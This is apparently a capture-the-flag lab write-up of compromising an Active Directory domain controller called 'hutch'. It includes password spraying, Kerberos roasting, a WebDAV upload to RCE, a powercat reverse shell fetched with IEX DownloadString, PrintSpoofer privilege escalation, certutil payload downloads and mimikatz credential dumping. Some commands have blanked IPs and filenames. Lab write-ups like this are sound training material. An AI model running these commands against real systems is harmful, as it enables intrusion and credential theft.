Looks like we are dealing with a Domain controller (port 53 / port 88)


DNS enumeration

We started with few common domain enumeration technique which didn’t yield anything exploitable

DNS Snoop

dnsrecon -t snoop -n

Reverse Lookup

dnsrecon -d -r

Zone Transfer

dig @ AXFR hutch.offsec

HTTP port 80

Looking into the port 80 we can see the following

A Nikto scan of the site reveals “Webdav”

Unfortunately, this Webdav seems unaccessible without a valid user


We don’t seem to have access to the shares without a valid user

export IP=""
mbclient -U '%' -L //$IP && smbclient -U 'guest%' -L //$IP && smbclient -U '' -L //$IP

Ldap enumeration

Enumerating ldap with nmap didn’t reveal anything exploitable

nmap -n -sV --script "ldap* and not brute" > ldap_nmap.txt

Instead, first using to get the server information

python3 /opt/ldapsearch-ad/ -l -t info

then using ldapsearch (with an anonymous user) gave us a better result

ldapsearch -x -H ldap:// -D 'hutch.offsec' -w '' -b "DC=hutch,DC=offsec" > ldap_nmap.txt

User enumeration

The previous step “ldap enumeration” has revealed a list of users

Starting with a cleanup of our users list

We are then able to validate those users against the Kerberos server

/home/clobee/go/bin/kerbrute userenum --dc $IP --domain hutch.offsec users_hutch.txt

Password spray

Using our users list and the password “CrabSharkJellyfish192” we were able to validate our access to the machine

crackmapexec smb -u users_hutch.txt -p users_hutch.txt --continue-on-success | grep '+'

Our credentials are valid “fmcsorley/CrabSharkJellyfish192” on SMB only (WinRm wasn’t successful)

Further enumeration

Using Enum4linux like such

enum4linux -a -u 'fmcsorley' -p 'CrabSharkJellyfish192' $IP

we were able to discover an additional user “domainadmin”

A list of “viewable” shares


Dumping secrets

Remotely dumping secrets from the server wasn’t successful

python3 /usr/local/bin/ -just-dc -no-pass

/usr/local/bin/ 'fmcsorley:CrabSharkJellyfish192'@

Kerberos Attacks


If a user doesn’t have the attribute DONT_REQ_PREAUTH we can request a AS_REP message for that user that will contain some data encrypted by a derivation of the password of the user.

Let list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH).

/home/clobee/.local/bin/ hutch.offsec/ -usersfile users_hutch.txt -dc-ip $IP -outputfile hashes.asreproast

Unfortunately we haven’t found anything exploitable while running this command.


The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline.

Using to Kerberoast, we were not able to retrieve any information from the server

python3 /opt/impacket/examples/ hutch.offsec/fmcsorley:'CrabSharkJellyfish192' -dc-ip $IP -request

RCE via Webdav

With our user credential find in the previous steps

davtest -auth fmcsorley:'CrabSharkJellyfish192' -sendbd auto -url http://$IP

We have found, that we can upload files on the server:

While on the server we can see that we have code execution with extension like asp, aspx

Visiting one of the executable file, we get the following

Initial reverse shell

Let’s use Powercat, a PowerShell native backdoor listener and reverse shell.

Let’s first download PowerShell in your local machine and transfer the powercat.ps1 to the victim server using python HTTP server

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('');powercat -c -p 443 -e cmd"

Then in our local we can catch the reverse shell


Verifying permissions

Looking into our permissions we can see some interesting options

The OS is Microsoft Windows 2019

The architecture is AMD64

With SeImpersonatePrivilege being enabled it seems that the host is likely to be vulnerable to


Let’s get the PrintSpoofer from github


Let’s download our tools onto the victim machine

certutil -urlcache -f c:\windows\temp\nc.exe
certutil -urlcache -f c:\windows\temp\PrintSpoofer64.exe

cd c:\windows\temp\

.\PrintSpoofer64.exe -i -c cmd

We can either get a reverse shell using the following

.\PrintSpoofer.exe -c ".\nc.exe 443 -e cmd"

or simply run our PrintSpoofer executable and own the system user


Dumping Hashes

Let’s upload mimikatz on the server

certutil -urlcache -f  C:\Windows\System32\spool\drivers\color\mimikatz.exe

C:\Windows\System32\spool\drivers\color\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam"